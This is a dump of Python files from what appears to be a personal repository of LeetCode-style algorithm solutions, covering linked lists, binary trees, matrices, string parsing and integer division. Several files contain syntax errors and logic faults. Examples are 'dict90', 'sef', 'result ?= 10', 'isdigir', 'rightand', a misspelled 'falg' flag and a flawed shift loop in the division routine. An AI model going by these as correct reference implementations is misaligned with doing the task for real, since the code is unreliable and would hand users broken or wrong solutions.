+x\n\n$PREFIX/bin/iverilog -V\n$PREFIX/bin/iverilog -h || true\n\ncd test\n\n# Hello world test\necho\necho\necho \"Hello World Test =====\"\necho $PREFIX/bin/iverilog -v hello_world.v -o hello_world\n$PREFIX/bin/iverilog -v hello_world.v -o hello_world\necho \"----------------------\"\ncat hello_world\necho \"----------------------\"\n./hello_world | tee output.log\necho \"----------------------\"\ngrep -q 'Hello, World' output.log\necho \"----------------------\"\n\n# Counter\necho\necho\necho \"Counter Test =========\"\necho iverilog -o test_counter counter_tb.v counter.v\niverilog -o test_counter counter_tb.v counter.v\necho \"----------------------\"\ncat test_counter\necho \"- - - - - - - - - - --\"\necho vvp -n test_counter\nvvp -n test_counter\necho \"----------------------\"\necho iverilog -o test_counter -c counter_list.txt\niverilog -o test_counter -c counter_list.txt\necho \"- - - - - - - - - - --\"\necho vvp -n test_counter\nvvp -n test_counter\necho \"----------------------\"\n\n# More advanced test\necho\necho\necho \"FSM Test =============\"\necho iverilog -o test_fsm fsm.v\niverilog -o test_fsm fsm.v\necho \"----------------------\"\ncat test_fsm\necho \"----------------------\"\n./test_fsm\necho \"----------------------\"\n" }, { "alpha_fraction": 0.6124030947685242, "alphanum_fraction": 0.6201550364494324, "avg_line_length": 8.214285850524902, "blob_id": 
"2a409acb0e0dab2de7b9d14519837ee1f2ee73ea", "content_id": "d605fb7c1b4a2e1d126486ac0eaed09f455a683d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "permissive", "max_line_length": 31, "num_lines": 14, "path": "/icestorm/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmake -j$CPU_COUNT\n\nmake install\n\nicetime -h || true\n" }, { "alpha_fraction": 0.7561436891555786, "alphanum_fraction": 0.7580340504646301, "avg_line_length": 24.190475463867188, "blob_id": "dca3ee63b41f295449e43b6d4ad9f65ccece0200", "content_id": "0875d7808f92bbb3e36808b8dc8db0ae0a526df9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 529, "license_type": "permissive", "max_line_length": 98, "num_lines": 21, "path": "/netlistsvg/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nwhich npm\nnpm install -g .\n\n# Remove links created by npm\nunlink $PREFIX/bin/netlistsvg\nunlink $PREFIX/bin/netlistsvg-dumplayout\nunlink $PREFIX/lib/node_modules/netlistsvg\n\n# Copy the content instead, make relative links\ncp -r ./ $PREFIX/lib/node_modules/netlistsvg\nln -r -s $PREFIX/lib/node_modules/netlistsvg/bin/netlistsvg.js $PREFIX/bin/netlistsvg\nln -r -s $PREFIX/lib/node_modules/netlistsvg/bin/exportLayout.js $PREFIX/bin/netlistsvg-dumplayout\n" }, { "alpha_fraction": 0.6860795617103577, "alphanum_fraction": 0.7002840638160706, "avg_line_length": 21.70967674255371, "blob_id": "b0fa2ee595ffcd77b5073ffd83df9ada276cca13", "content_id": "8258bb60d6e6770c8bbe9696ba0de8edea7705c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 704, "license_type": "permissive", "max_line_length": 70, "num_lines": 31, "path": "/.travis/after_failure.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $TRAVIS_BUILD_DIR/.travis/common.sh\n\n# Close the after_failure fold travis has created already.\ntravis_fold end after_failure\n\n$SPACER\n\nstart_section \"failure.tail\" \"${RED}Failure output...${NC}\"\necho \"Log is $(wc -l /tmp/output.log) lines long.\"\necho \"Displaying last 1000 lines\"\necho\ntail -n 1000 /tmp/output.log\nend_section \"failure.tail\"\n\n$SPACER\n\n#COUNT=0\n#for i in $(find $BASE_PATH -name config.log); do\n#\tstart_section \"failure.log.$COUNT\" \"${RED}Failure output $i...${NC}\"\n#\tcat $i\n#\tend_section \"failure.log.$COUNT\"\n#\tCOUNT=$((COUNT+1))\n#done\n#\n#$SPACER\n\nstart_section \"failure.log.full\" \"${RED}Failure output.log...${NC}\"\ncat /tmp/output.log\nend_section \"failure.log.full\"\n" }, { "alpha_fraction": 0.6609442234039307, "alphanum_fraction": 0.7038626670837402, "avg_line_length": 17.83783721923828, "blob_id": "28acef28b09067b8dc22c392c21d6d51681a38a4", "content_id": "b99469cb20b2e59a8e706a69e97fdccf0b9e458d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 699, "license_type": "permissive", "max_line_length": 117, "num_lines": 37, "path": "/README.md", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "# conda-hdmi2usb-packages\n\nConda build recipes for HDMI2USB-litex-firmware 
build dependencies.\n\nBasically, anything which hasn't gotten a proper package at https://launchpad.net/~timvideos/+archive/ubuntu/hdmi2usb\n\n# Toolchains\n\n## LiteX \"soft-CPU\" support\n\nThe LiteX system supports both a `lm32` and `or1k` \"soft-CPU\" implementations.\n\nCurrent versions are;\n\n * binutils - 2.28.0\n * gcc - 5.4.0\n * gcc+newlib - 5.4.0 + 2.4.0\n * gdb - 7.11\n\n### lm32-elf\n\n * All come from upstream.\n\n### or1k-elf\n\n * binutils - upstream\n * gcc, newlib & gdb - or1k forks based on upstream version.\n\n## Cypress FX2 support\n\n * sdcc (Current version: 3.5.0)\n\n# Support Tools\n\n## OpenOCD\n\nTool for JTAG programming.\n \n" }, { "alpha_fraction": 0.731249988079071, "alphanum_fraction": 0.731249988079071, "avg_line_length": 19, "blob_id": "0edc1f2d078927a1be02b56a2c3ba8320de21169", "content_id": "c573a137b593742fec60f1a7b135349eefe3c890", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 320, "license_type": "permissive", "max_line_length": 79, "num_lines": 16, "path": "/slang/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nexport CC=gcc-${USE_SYSTEM_GCC_VERSION}\nexport CXX=g++-${USE_SYSTEM_GCC_VERSION}\n\nmkdir build && cd build\n\ncmake .. -DSLANG_INCLUDE_TESTS=OFF -DCMAKE_BUILD_TYPE=Release -DSTATIC_BUILD=ON\n\nmake\n\ninstall -D bin/slang $PREFIX/bin/slang-driver\ninstall -D bin/rewriter $PREFIX/bin/slang-rewriter\n" }, { "alpha_fraction": 0.6529411673545837, "alphanum_fraction": 0.658823549747467, "avg_line_length": 11.071428298950195, "blob_id": "50dd0701d44c64ffbd57026270d1ae387c43f049", "content_id": "095544047b257386c629ae62d31933f77ed650c6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "permissive", "max_line_length": 41, "num_lines": 14, "path": "/prjxray-tools/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmkdir build\ncd build\ncmake -DCMAKE_INSTALL_PREFIX=${PREFIX} ..\nmake -j$(nproc)\nmake install\n\n" }, { "alpha_fraction": 0.7039626836776733, "alphanum_fraction": 0.7179487347602844, "avg_line_length": 14.321428298950195, "blob_id": "4165aca8a811a5ea2b1f2bfc3684a69289e5fd8c", "content_id": "c5528d8dc028fac4745e98771f63dd56342d4302", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 429, "license_type": "permissive", "max_line_length": 47, "num_lines": 28, "path": "/symbiflow-yosys/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\n#unset CFLAGS\n#unset CXXFLAGS\n#unset CPPFLAGS\n#unset DEBUG_CXXFLAGS\n#unset DEBUG_CPPFLAGS\n#unset LDFLAGS\n\nwhich pkg-config\n\nmake config-conda-linux\necho \"PREFIX := $PREFIX\" >> Makefile.conf\n\nmake V=1 -j$CPU_COUNT\nmake test\nmake install\n\n$PREFIX/bin/yosys -V\n$PREFIX/bin/yosys-abc -v 2>&1 | grep compiled\n$PREFIX/bin/yosys -Q -S tests/simple/always01.v\n" }, { "alpha_fraction": 0.573236882686615, "alphanum_fraction": 0.5862568020820618, "avg_line_length": 30.067415237426758, "blob_id": "f70ac8e7bc639777757f253294f14658c9413b69", "content_id": "738ab2c2ac449576adbee33eaf65fd1d4dae3780", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, 
"is_vendor": false, "language": "Shell", "length_bytes": 2765, "license_type": "permissive", "max_line_length": 112, "num_lines": 89, "path": "/conda-tag-filter.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n\nPACKAGE=${1:-PACKAGE}\n\nTAG_EXTRACT='[0-9]+[_.][0-9]+([_.][0-9])?([._\\-]rc[0-9]+)?([_\\-][0-9]+[_\\-]g[0-9a-fA-F]+)?$'\nTAG_PATTERN='^v[0-9]+\\.[0-9]+(\\.[0-9]+|\\.rc[0-9]+)*$'\n\nfor CONDA_GIT_URL in $(cat $PACKAGE/meta.yaml | grep \"git_url\" | sed -e's/.* //'); do\nCONDA_GIT_DIR=$CONDA_PATH/conda-bld/git_cache/$(echo \"$CONDA_GIT_URL\" | grep -o '://.*' | cut -f3- -d/)\nif [ ! -d $CONDA_GIT_DIR ]; then\n\tgit clone --bare \"$CONDA_GIT_URL\" $CONDA_GIT_DIR\nfi\n(\n\texport GIT_DIR=$CONDA_GIT_DIR\n\n\tCURRENT_HEAD=$(git rev-parse HEAD)\n\tLAST_HEAD=$(cat $GIT_DIR/TAG_FILTER 2> /dev/null || true)\n\tif [ g\"$LAST_HEAD\" != g\"$CURRENT_HEAD\" -o 1 -eq 1 ]; then\n\t\t# Disable automatic fetching of tags\n\t\tgit config remote.origin.tagOpt --no-tags\n\n\t\t# Remove all tags\n\t\tfor TAG in $(git tag --list); do\n\t\t\tgit tag -d $TAG > /dev/null\n\t\tdone\n\n\t\t# Manually fetch the tags\n\t\techo \"Fetching tags..\"\n\t\tgit fetch --tags\n\t\techo\n\n\t\techo \"Initial set of tags:\"\n\t\tgit tag --list | sort --version-sort | grep --color=always -e \"^\" -e $TAG_PATTERN | sed -e's/^/ * /'\n\t\techo\n\n\t\t# Rewrite non-standard tags\n\t\tfor TAG in $(git tag --list | sort --version-sort | grep -P \"$TAG_EXTRACT\"); do\n\t\t\tTAG_VALUE=v$(echo $TAG | grep -o -P \"$TAG_EXTRACT\" | sed -e's/[_\\-]g[0-9a-fA-F]\\+//' -e's/-/./g' -e's/_/./g')\n\t\t\tif [ \"$TAG\" = \"$TAG_VALUE\" ]; then\n\t\t\t\tcontinue\n\t\t\tfi\n\t\t\tTAG_HASH=\"$(git rev-parse $TAG^{})\"\n\t\t\tTAG_VALUE_HASH=\"$(git rev-parse $TAG_VALUE^{} 2> /dev/null || true)\"\n\t\t\tif [ \"$TAG_VALUE_HASH\" = \"$TAG_VALUE^{}\" ]; then\n\t\t\t\tgit tag -m\"From tag $TAG\" -a $TAG_VALUE $TAG_HASH\n\t\t\t\techo \"New extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\telif [ \"$TAG_VALUE_HASH\" != \"$TAG_HASH\" ]; then\n\t\t\t\tgit tag -d $TAG_VALUE\n\t\t\t\tgit tag -m\"From tag $TAG\" -a $TAG_VALUE $TAG_HASH\n\t\t\t\techo \"Updated extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\telse\n\t\t\t\techo \"Existing extracted tag - $TAG -> $TAG_VALUE ($TAG_HASH)\"\n\t\t\tfi\n\t\tdone\n\t\techo\n\n\t\tif [ -e $PACKAGE/extra.tags ]; then\n\t\t\tcat $PACKAGE/extra.tags | while read TAG TAG_HASH; do\n\t\t\t\tgit tag -m\"Extra tag\" -a $TAG $TAG_HASH\n\t\t\t\techo \"Extra tag added - $TAG ($TAG_HASH)\"\n\t\t\tdone\n\t\t\techo\n\t\tfi\n\n\t\t# Remove all the non-version tags\n\t\tfor TAG in $(git tag --list | sort --version-sort | grep -P -v \"$TAG_PATTERN\"); do\n\t\t\tgit tag -d $TAG\n\t\tdone\n\t\techo\n\n\t\t# Add a tag if it doesn't exist\n\t\tif [ $(git tag --list | wc -l) -eq 0 ]; then\n\t\t\tOLDEST_COMMIT=$(git log --reverse --pretty=%H | head -n1)\n\t\t\techo \"Adding v0.0 to $OLDEST_COMMIT (first commit in repository!)\"\n\t\t\tgit tag -a v0.0 $OLDEST_COMMIT -m\"v0.0\"\n\t\t\techo\n\t\tfi\n\t\tgit rev-parse HEAD > $GIT_DIR/TAG_FILTER\n\n\t\t# List the remaining tags\n\t\techo \"Remaining tags\"\n\t\tgit tag --list | sort --version-sort | sed -e's/^/ * /'\n\t\techo\n\tfi\n\techo \"Git describe output: '$(git describe --tags)'\"\n)\ndone\n" }, { "alpha_fraction": 0.6452991366386414, "alphanum_fraction": 0.6581196784973145, "avg_line_length": 12, "blob_id": "013f7d05d950e4fb1816363b8f921747e6031d4b", "content_id": "37c1e606fa94733298c6392b88f3821b763c85da", 
"detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 234, "license_type": "permissive", "max_line_length": 35, "num_lines": 18, "path": "/riscv32/binutils/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nmkdir build\ncd build\n../configure \\\n --target=riscv32-elf \\\n --prefix=$PREFIX \\\n --enable-deterministic-archives \\\n\nmake -j$CPU_COUNT\nmake install-strip\n" }, { "alpha_fraction": 0.5775700807571411, "alphanum_fraction": 0.5794392228126526, "avg_line_length": 16.83333396911621, "blob_id": "e445821601fca892dadee972113dee216b3fd5d2", "content_id": "961490551776be686d666ecbc4bc04ab4b340256", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 535, "license_type": "permissive", "max_line_length": 67, "num_lines": 30, "path": "/netlistsvg/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset +x\n\necho \"------------------------\"\n\necho $PWD\nwhich yosys\nwhich netlistsvg\n\necho \"------------------------\"\n\nNETLISTSVG=$(which netlistsvg)\nNETLISTSVG_SKIN=$PREFIX/lib/node_modules/netlistsvg/lib/default.svg\nNETLISTSVG_EXAMPLES=$PREFIX/lib/node_modules/netlistsvg/examples/*\ncp -aR $NETLISTSVG_EXAMPLES .\n\nsed -i -e's/\\( %\\.[^ ]*\\)png/\\1svg/g' Makefile\n\necho \"------------------------\"\n\nmake \\\n\tNETLISTSVG=$NETLISTSVG \\\n\tNETLISTSVG_SKIN=$NETLISTSVG_SKIN \\\n\tbuild.all\n\necho \"------------------------\"\n\nls *.svg\n" } ]
43
SreecharanG/Personal_Work
https://github.com/SreecharanG/Personal_Work
02a35ce511ac6aaf7cddb3c526cc05fc36c96169
a6c1a986984426a348660c85fbf37a6c4919cdb2
bb9d86b16b3ff02f20af92d08ae7905aa1b0c53c
refs/heads/master
2018-09-26T02:21:37.615050
2018-07-20T05:41:11
2018-07-20T05:41:11
120,911,488
0
0
null
2018-02-09T13:52:35
2018-07-18T06:41:06
2018-07-20T05:41:12
Python
[ { "alpha_fraction": 0.6740442514419556, "alphanum_fraction": 0.6780683994293213, "avg_line_length": 19.75, "blob_id": "7cdfca4a214fca54a388a0ecce8a3a3086a65153", "content_id": "261829cf42462466430935733600fdb3372cb36e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "permissive", "max_line_length": 46, "num_lines": 24, "path": "/Part4/Copy_List_With_Random_Pointer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class RandomListNode(object):\n\tdef __init__(self, x):\n\t\tself.label = x\n\t\tself.next = None\n\t\tself.random = None\n\nclass Solution(object):\n\tdef copyRandomList(self, head):\n\t\tif not head:\n\t\t\treturn None\n\n\t\tvisited = dict90\n\t\tnode = head\n\t\twhile node:\n\t\t\tvisited[node] = RandomListNode(node.label)\n\t\t\tnode = node.next\n\n\t\tvisited[None] = None\n\t\tnode = head\n\t\twhile node:\n\t\t\tvisited[node].next = visited[node.next]\n\t\t\tvisited[node].random = visited[node.random]\n\t\t\tnode = node.next\n\t\treturn visited[head]" }, { "alpha_fraction": 0.5449010729789734, "alphanum_fraction": 0.564687967300415, "avg_line_length": 23.296297073364258, "blob_id": "0e01ad2ae108dc3b3b3c93f74511d4a7581baaf2", "content_id": "4a5da2a3177edbf5926546754b678b058e75e400", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 65, "num_lines": 27, "path": "/Part1/Max_Points_on_a_Line.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Point(object):\n\tdef __init__(self, a=0, b=0):\n\t\tself.x = a\n\t\tself.y = b\n\nclass Solution(object):\n\tdef maxPoints(self, points):\n\t\tn = len(points)\n\t\tslope_map = {}\n\t\tresult = 0\n\t\tfor i in range(n):\n\t\t\tslope_map.clear()\n\t\t\tsame, vertical = 1, 0\n\t\t\tslope_max = 0\n\t\t\tfor j in range(i + 1, n):\n\t\t\t\tdx, dy = points[i].x - points[j].x, points[i].y - points[j].y\n\n\t\t\t\tif dx == dy == 0:\n\t\t\t\t\tsame += 1\n\t\t\t\telif dx == 0:\n\t\t\t\t\tvertical += 1\n\t\t\t\telse:\n\t\t\t\t\tslope = float(dy) / float(dx)\n\t\t\t\t\tslope_map[slope] = slope_map.get(slope, 0) + 1\n\t\t\t\t\tslope_max = max(slope_max, slope_map[slope])\n\t\t\tresult = max(result, max(slope_max, vertical) + same) \n\t\treturn result\n\t" }, { "alpha_fraction": 0.6320000290870667, "alphanum_fraction": 0.6320000290870667, "avg_line_length": 20.882352828979492, "blob_id": "1172802422dca99bb0b871fd4c089da9dac009cf", "content_id": "5bfcb2ea415ad9b7b312d098babdd9e4cf2236c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/Part2/Flatten_Binary_Tree_To_Linked_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef flatten(self, root):\n\t\tstack = []\n\t\twhile root:\n\t\t\tif root.left:\n\t\t\t\tif root.right:\n\t\t\t\t\tstack.append(root.right)\n\t\t\t\troot.right, root.left = root.left, None\n\t\t\tif not root.right and stack:\n\t\t\t\troot.right = stack.pop()\n\t\t\troot = root.right\n\t\t\t" }, { "alpha_fraction": 0.6014760136604309, "alphanum_fraction": 0.6420664191246033, "avg_line_length": 22.39130401611328, "blob_id": 
"66a2b33700dfdf2fd13a5c03564d34fef21a28b0", "content_id": "c1cc10d417a0ee012528ad1cdfe63f56d8facded", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "permissive", "max_line_length": 67, "num_lines": 23, "path": "/Part4/Divide_Two_Integers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef divide(self, dividend, divisor):\n\t\tMAX_INT = 2147483647\n\t\tsign = 1\n\t\tif dividend >= 0 and divisor < 0 or dividend <=0 and divisor > 0:\n\t\t\tsign = -1\n\n\t\tdividend = abs(dividend)\n\t\tdivisor = abs(divisor)\n\n\t\tresult = 0\n\t\tcurrent = divisor\n\t\tcurrentResult = 1\n\t\twhile current <= dividend:\n\t\t\tcurrent <<= 1\n\t\t\tcurrentResult <<= 1\n\t\twhile divisor <= dividend:\n\t\t\tcurrent <<= 1\n\t\t\tcurrentResult <<= 1\n\t\t\tif current <= dividend:\n\t\t\t\tdividend -= current\n\t\t\t\tresult += currentResult\n\t\treturn min(sign * result, MAX_INT)\n\n\t\t\t" }, { "alpha_fraction": 0.6375404596328735, "alphanum_fraction": 0.6407766938209534, "avg_line_length": 16.657142639160156, "blob_id": "0d23414b60fdbb68da28ff472d1fdb54f3941e54", "content_id": "c4b14e21be3d76e3b4564f5b295fbbf382d053fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 36, "num_lines": 35, "path": "/Part3/Reverse_Nodes_In_K_Group.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tself.val = x\n\tself.next = None\n\nclass Solution(object):\n\tdef reverseKGroup(self, head, k):\n\t\tif not head or k <= 1:\n\t\t\treturn head\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\ttemp = dummy\n\t\twhile temp:\n\t\t\ttemp = self.reverseNextK(temp, k)\n\t\treturn dummy.next\n\n\tdef reverseNextK(self, head, k):\n\t\ttemp = head\n\t\tfor i in range(k):\n\t\t\tif not temp.next:\n\t\t\t\treturn None\n\t\t\ttemp = temp.next\n\n\t\tnode = head.next\n\t\tprev = head\n\t\tcurr = head.next\n\n\t\tfor i in range(k):\n\t\t\tnextNode = curr.next\n\t\t\tcurr.next = prev\n\t\t\tprev = curr\n\t\t\tcurr = nextNode\n\n\t\tnode.next = curr\n\t\thead.next = prev\n\t\treturn node\n" }, { "alpha_fraction": 0.6460905075073242, "alphanum_fraction": 0.654321014881134, "avg_line_length": 33.42856979370117, "blob_id": "e1bd8420b71a77e71d7acf74302d215e90d8ce5e", "content_id": "d8b0685e11f18c52395b47028aec1ff49181081a", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "permissive", "max_line_length": 93, "num_lines": 7, "path": "/Part4/Largest_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from functools import cmp_to_key\n\nclass Solution:\n\tdef largstNumber(sel, nums):\n\t\tsorted_nums = sorted(map(str, nums), key = cmp_to_key(lambda x, y:int(y + x) - int(x + y)))\n\t\tresult = \"\".join(sorted_nums).lstrip('0')\n\t\treturn result or '0'\n\t\t" }, { "alpha_fraction": 0.5248447060585022, "alphanum_fraction": 0.5465838313102722, "avg_line_length": 19.645160675048828, "blob_id": "8698bcea257926fdcd5db86682ff9bd4f68649ee", "content_id": "3b71afd1eaf4d27471a8b15a636fe9e72825c862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/Part1/Spiral_Matrix_2.py", 
"repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef generateMatrix(self, n):\n\t\tleft = top = 0\n\t\tright = n - 1\n\t\tbottom = n - 1\n\t\tnum = 1\n\t\tresult = [[o for __ in range(n)] for __ in range(n)]\n\t\twhile left < right and top < bottom:\n\t\t\tfor i in range(left, right):\n\t\t\t\tresult[top][i] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(top, bottom):\n\t\t\t\tresult[i][right] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(right, left, -1):\n\t\t\t\tresult[bottom][i] = num\n\t\t\t\tnum += 1\n\n\t\t\tfor i in range(bottom, top, -1):\n\t\t\t\tresult[i][left] = num\n\t\t\t\tnum += 1\n\n\t\t\tleft += 1\n\t\t\tright -= 1\n\t\t\ttop += 1\n\t\t\tbottom -= 1\n\t\tif left == rightand top == bottom:\n\t\t\tresult[top][left] = num\n\t\treturn result\n\t\t\n\n" }, { "alpha_fraction": 0.4877651035785675, "alphanum_fraction": 0.5448613166809082, "avg_line_length": 16.02777862548828, "blob_id": "0b6e654f7fc58677b147c19e3389b6d5f086bb64", "content_id": "837a1715ae555c942320223ecf91131eccda3fa4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "permissive", "max_line_length": 37, "num_lines": 36, "path": "/Part4/String_To_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef myAtoi(self, str):\n\t\tINT_MAX = 2147483647\n\t\tINT_MIN = -2147483647\n\n\t\tif not str:\n\t\t\treturn 0\n\t\tstr = str.strip()\n\t\tif not str:\n\t\t\treturn 0\n\t\tflag = 1\n\t\tif str[0] in ['+', '-']:\n\t\t\tif str[0] == '-':\n\t\t\t\tfalg = -1\n\t\t\tstr = str[1:]\n\n\n\t\tif not str or not str[0].isdigit():\n\t\t\treturn 0\n\n\t\tfor i, v in enumerate(str):\n\t\t\tif not v.isdigir():\n\t\t\t\tstr = str[:i]\n\t\t\t\tbreak\n\t\t\tresult = 0\n\t\t\tfor v in str[:]:\n\t\t\t\tresult += ord(v) - ord('0')\n\t\t\t\tresult *= 10\n\t\t\tresult ?= 10\n\t\t\tresult *= flag\n\n\t\t\tif result > INT_MAX:\n\t\t\t\treturn INT_MAX\n\t\t\tif result < INT_MIN:\n\t\t\t\treturn INT_MIN\n\t\t\treturn result\n" }, { "alpha_fraction": 0.6501901149749756, "alphanum_fraction": 0.6558935642242432, "avg_line_length": 19.920000076293945, "blob_id": "e797848e4de47c4ba624ddb4987afd51717f59a4", "content_id": "6829b7475f1ff7fcd45c120caff4d3b51ebc4ee6", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "permissive", "max_line_length": 38, "num_lines": 25, "path": "/Part4/Partition_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef partition(self, head, x):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tsmall_dummy = ListNode(-1)\n\t\tlarge_dummy = ListNode(-1)\n\n\n\t\tprev = dummysmall_prev = small_dummy\n\t\tlarge_prev = large_dummy\n\n\t\twhile prev.next:\n\t\t\tcurr = prev.next\n\t\t\tif curr.val < x:\n\t\t\t\tsmall_prev.next = curr\n\t\t\t\tsmall_prev = small_prev.next\n\n\t\t\telse:\n\t\t\t\tlarge_prev.next = curr\n\t\t\t\tlarge_prev = large_prev.next\n\t\t\tprev = prev.next\n\n\t\tlarge_prev.next = None\n\t\tsmall_prev.next = large_dummy.next\n\t\treturn small_dummy.next\n\n\t\t" }, { "alpha_fraction": 0.6437389850616455, "alphanum_fraction": 0.6455026268959045, "avg_line_length": 24.81818199157715, "blob_id": "048adc3dd91b4776f637d216237d00ea3f230eb9", "content_id": "c1affb92fbcf43ac49e3f6bc1ab1bcf42c2c47bc", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/Part3/Path_Sum_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\nclass Solution(object):\n\tdef pathSum(self, root, sum):\n\t\tresult = []\n\t\tself._pathSum(root, sum, [], result)\n\t\treturn result\n\n\tdef _pathSum(self, root, sum, curr, result):\n\t\tif not root:\n\t\t\treturn\n\t\tsum -= root.val\n\t\tif sum == 0 and root.left is None and root.right is None :\n\t\t\tresult.append(curr + [root.val])\n\n\t\tif root.left:\n\t\t\tself._pathSum(root.left, sum, curr + [root.val], result)\n\t\tif root.right:\n\t\t\tself._pathSum(root.right, sum, curr + [root.val], result)" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 19.33333396911621, "blob_id": "6570cd9f8620151e7930f2a28ff4257dfce41d47", "content_id": "bb3d4ae762d1224f65a5e5a45533d4f8ac05c9a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 30, "num_lines": 6, "path": "/Part1/Single_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tsef singleNumber(self, nums):\n\tresult = nums[0]\n\tfor i in nums[1:]:\n\t\tresult ^= i\n\treturn result\n\t" }, { "alpha_fraction": 0.6401098966598511, "alphanum_fraction": 0.6401098966598511, "avg_line_length": 19.11111068725586, "blob_id": "6f881cddb52ff91164db136644dcf1b98f197524", "content_id": "9f303527ff421921b6c54b2000d8829c590fe44a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 35, "num_lines": 18, "path": "/Part2/Binary_Tree_Preorder_Traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef preorderTraversal(self, root):\n\t\tstack = []\n\t\tresult = []\n\t\twhile root or 